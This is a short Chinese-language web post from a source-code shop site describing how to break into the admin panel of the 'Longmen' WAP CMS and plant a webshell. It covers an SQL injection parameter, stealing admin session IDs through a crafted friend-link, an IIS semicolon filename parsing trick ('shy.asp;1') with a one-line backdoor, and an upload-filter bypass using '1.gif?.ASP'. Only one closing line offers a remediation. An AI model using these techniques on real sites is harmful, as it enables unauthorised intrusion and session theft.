您好,欢迎光临本店!  登录  免费注册
当前位置: 首页 > 站长资讯 > 网站安全 > 龙门程序后台拿webshell及修复

龙门程序后台拿webshell及修复

WEB新概念建站源码超市 / 2012-02-10
[] [] []

程序下载地址:http://wapvy.cn/FILE/DOWNLOAD/2011/07/09/2011070902255801.rar
 
 
第一注入:http://www.2cto.com /bbs/bbsvice.asp?action=view&id=[sql]
 有过滤;鸡肋
 
第二串号,通杀wap手机网程序,就是获取后台来源地址,同asp大马后门原理,插在友链处,
 等管理员点击你精心构造的地址他就上当了,web是盗Cookies,而wap是盗sid识别码;
 比如http://www.webxgn.com /admin/adki.asp?sid=ad422aa442422dad244242
 直接进后台
 
拿shell大概两种方法:自写页面  名称填shy.asp;1
 内容插一句话,利用解析漏洞得到后门/wml/shy.asp;1.wml菜刀连接
 
第二种    文件采集   
把asp马改后缀gif上传到你的FTP,远程采集地址填http://www.webxgn.com /1.gif?.ASP
 成功绕过各种过滤,这程序很变态,看文件以什么结尾就认为是什么格式,过滤了asp用ASP绕过,因为后面加个?.ASP不影响原地址,进文件管理 查看   shell一般地址为www.webxgn.com /files/201201244242424242.ASP
 我相信web程序也有这些漏洞拿shell,学习思路吧

加强过滤防止注射,xss,注意自卸页面的过滤。
 

用户评论
暂时还没有任何用户评论
用户名: 匿名用户
E-mail:
评价等级:
评论内容:
验证码: captcha

网店帮助

© 2005-2017 WEB新概念建站源码超市 版权所有,并保留所有权利。
广东省东莞市南城行政中心区簪花路华南建设大厦707室WEB新概念网络科技 Tel: 罗先生13480055593,黄先生15102077200 E-mail: server@webxgn.com
QQ 784159683 QQ 2267914584 MSN Messi.h2009@hotmail.com
ICP备案证书号:粤ICP备10099352号
支付宝信任商家 广东省网站信用联盟 支付宝信任商家 网络消费安全港 网警
分享到:
新概念源码超市
源码咨询:
源码咨询:
代理咨询:
代理咨询: